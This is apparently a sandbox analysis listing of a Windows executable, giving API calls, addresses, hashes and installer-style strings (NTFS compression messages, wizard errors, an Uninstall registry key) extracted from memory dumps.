                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                              • String ID:
                                                              • API String ID: 4025006896-0
                                                              • Opcode ID: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                              • Instruction ID: e8d232a05c88a2160d81946a52d6ac90de0a8bd7e5396313334bc6410d622602
                                                              • Opcode Fuzzy Hash: 17400656b2714228e1ab5d36733c826c34e0b7aebe27f437723bcf7a68a21383
                                                              • Instruction Fuzzy Hash: 7B011B722401047BDA10EB6DED81E9B3799D719314B11413BBA15E72A1D7369C154BAC
                                                              APIs
                                                              • WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                              • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                              • CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                              • String ID:
                                                              • API String ID: 4071923889-0
                                                              • Opcode ID: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                              • Instruction ID: 44a5693fa59bfbe72ab063cfacecacb9b789a88f4d4f9747d0667cdf65a63c8e
                                                              • Opcode Fuzzy Hash: 45540edf5afa8ba95db9dec670ac0957df4a9836c83591dc179b3e9a7f9926ac
                                                              • Instruction Fuzzy Hash: 7201F9716046087EEB20979E8C06F6B7BACDF44774F610167F904DB2C2C6785D40C668
                                                              APIs
                                                              • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                              • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4,0000000A,REGDLL_EXE), ref: 0040D241
                                                              • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047C7C4), ref: 0040D25B
                                                              • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                              • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                              • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                              • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 004700ED
                                                              Strings
                                                              • Setting NTFS compression on directory: %s, xrefs: 004700BB
                                                              • Failed to set NTFS compression state (%d)., xrefs: 004700FE
                                                              • Unsetting NTFS compression on directory: %s, xrefs: 004700D3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                              • API String ID: 1452528299-1392080489
                                                              • Opcode ID: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                              • Instruction ID: 8e5543267561a70d3fbbbef991b1365390ff1382f756d9cdf86c8bb39141f558
                                                              • Opcode Fuzzy Hash: dfebb939fa925478a91c01d20c19499446f2cbe0988f19a8e93b7205f6de1292
                                                              • Instruction Fuzzy Hash: C9011730E0928C96CF05D7ADA0412DDBBF4DF4D314F84C1AFA45DE7282DA790609879A
                                                              APIs
                                                              • GetLastError.KERNEL32(?,00000000), ref: 00470899
                                                              Strings
                                                              • Failed to set NTFS compression state (%d)., xrefs: 004708AA
                                                              • Unsetting NTFS compression on file: %s, xrefs: 0047087F
                                                              • Setting NTFS compression on file: %s, xrefs: 00470867
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                              • API String ID: 1452528299-3038984924
                                                              • Opcode ID: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                              • Instruction ID: 78fa65e16581c334b53b8e167e27839d8ecb3154876bc13dabe901d18edf2e93
                                                              • Opcode Fuzzy Hash: 323dc33fe38fce2a535158e710f937577eac4405a22a140b88caf43724a8761b
                                                              • Instruction Fuzzy Hash: 5C01F430D092489ADB04A7E9A4412EDBBF49F09314F45C1ABA459E7282DAB9050947DB
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000,0045BB39), ref: 00455DC4
                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045BB12,?,?,?,?,?,00000000), ref: 00455DCD
                                                              • RemoveFontResourceA.GDI32(00000000), ref: 00455DDA
                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DEE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                              • String ID:
                                                              • API String ID: 4283692357-0
                                                              • Opcode ID: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                              • Instruction ID: 88a6b2d0cd2ebf9d052afffcb5c4be27c29a8e8e48dcb03e602a07ae18d4e81c
                                                              • Opcode Fuzzy Hash: 5aa6bc1fef2ece3e1d74d37f8f7457d5ece9b91b834f41029562ebbb00b702db
                                                              • Instruction Fuzzy Hash: E3F05EB6B4470176EA10B6B69C8BF2B229C9F54745F10883BBA00EF2C3D97CDC04962D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CountSleepTick
                                                              • String ID:
                                                              • API String ID: 2227064392-0
                                                              • Opcode ID: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                              • Instruction ID: e9c2c7e2fc271270d41d52dba3350464f1e42bdffd51bbfd166b1ef271046f5a
                                                              • Opcode Fuzzy Hash: b259759894679f81c91e5f8e49ac887a4ee880673b8cc13734a950e5130029b9
                                                              • Instruction Fuzzy Hash: 93E02B7130964845CA24B2BE28C37BF4A88CB8536AB14453FF08CD6242C42C4D05956E
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB,00000000), ref: 00478129
                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0047812F
                                                              • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478151
                                                              • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480D8E), ref: 00478162
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                              • String ID:
                                                              • API String ID: 215268677-0
                                                              • Opcode ID: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                              • Instruction ID: 3331d84468cd062744280f6e1aa24963878bc2b2d96e3aea022572b3ec77581d
                                                              • Opcode Fuzzy Hash: fbd84f65280b9b42d2110702e409595f627c02f938f534a1f8f22361ecaea6e1
                                                              • Instruction Fuzzy Hash: 70F030716843016BD600EAB5CC82E9B77DCEB44754F04893E7E98D72C1DA79DC08AB66
                                                              APIs
                                                              • GetLastActivePopup.USER32(?), ref: 0042425C
                                                              • IsWindowVisible.USER32(?), ref: 0042426D
                                                              • IsWindowEnabled.USER32(?), ref: 00424277
                                                              • SetForegroundWindow.USER32(?), ref: 00424281
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                              • String ID:
                                                              • API String ID: 2280970139-0
                                                              • Opcode ID: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                              • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                              • Opcode Fuzzy Hash: 3290ed535df25d2f1ddaed747f1c047a4a496922c2b2cea1102cb49f09a67e5c
                                                              • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                              APIs
                                                              • GlobalHandle.KERNEL32 ref: 00406287
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                              • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                              • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocHandleLockUnlock
                                                              • String ID:
                                                              • API String ID: 2167344118-0
                                                              • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                              • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                              • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                              • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                              APIs
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                              Strings
                                                              • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                              • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                              • API String ID: 3535843008-1938159461
                                                              • Opcode ID: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                              • Instruction ID: 3bf0094b3715a844c7fa4d69accdb7e726d223c3dcefaf8b2e4f531663087c06
                                                              • Opcode Fuzzy Hash: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                              • Instruction Fuzzy Hash: 5F814174E00149AFCB10DF95D881ADEBBF9EF48314F5081AAE814B7392D7389E05CB99
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                              • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                              Strings
                                                              • Will not restart Windows automatically., xrefs: 00483176
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveForeground
                                                              • String ID: Will not restart Windows automatically.
                                                              • API String ID: 307657957-4169339592
                                                              • Opcode ID: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                              • Instruction ID: df9a9ae9a8219d8b6a1298420550b74bcee7fa449f44545fa147fc9774bd32fa
                                                              • Opcode Fuzzy Hash: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                              • Instruction Fuzzy Hash: A7413330208340AED710FFA4DC9AB6E3BA4DB15F05F1408B7E9404B3A2D6BD5A04DB1D
                                                              Strings
                                                              • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                              • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                              • API String ID: 0-1974262853
                                                              • Opcode ID: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                              • Instruction ID: 63d40b18a6e87dbc706e62a2b7ed59e25ea13cd94e581da409b3f01416405f56
                                                              • Opcode Fuzzy Hash: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                              • Instruction Fuzzy Hash: 9A319E30A08244DFD711EB99D989BA977F6EB05308F1500FBF0489B392D779AE40CB1A
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                              • %s\%s_is1, xrefs: 00478E2C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                              • API String ID: 47109696-1598650737
                                                              • Opcode ID: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                              • Instruction ID: 403b8390735a8e98fed73365c843d129082673b7d0193522817cb9849c55968d
                                                              • Opcode Fuzzy Hash: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                              • Instruction Fuzzy Hash: 79218470B40208AFDB01DFAACC55A9EBBE8EB48304F90847EE904E7381DB785D018A59
                                                              APIs
                                                              • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                              • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMessageSendShell
                                                              • String ID: open
                                                              • API String ID: 812272486-2758837156
                                                              • Opcode ID: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                              • Instruction ID: 6e2feb9b457cb976a84d54f3b3258ed3b08e14d6ba220cef3ebd8abcd6e201e4
                                                              • Opcode Fuzzy Hash: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                              • Instruction Fuzzy Hash: 62219474E40208AFDB00DFA5C886B9EB7F8EB44705F2081BAB514E7282D7789E05CB58
                                                              APIs
                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00455318
                                                              • GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
                                                                • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: DirectoryErrorExecuteLastShellSystem
                                                              • String ID: <
                                                              • API String ID: 893404051-4251816714
                                                              • Opcode ID: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                              • Instruction ID: ea799879bbb6ab716a70283d096866571a468ac1fa4b8cc73728b10af3e72d10
                                                              • Opcode Fuzzy Hash: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                              • Instruction Fuzzy Hash: 02215370A00609ABDB10DFA5D8926AE7BF8AF18355F50443AFC44E7281D7789949CB58
                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                              • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02164CBC,000026A8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02164CBC,000026A8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02164CBC,000026A8,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
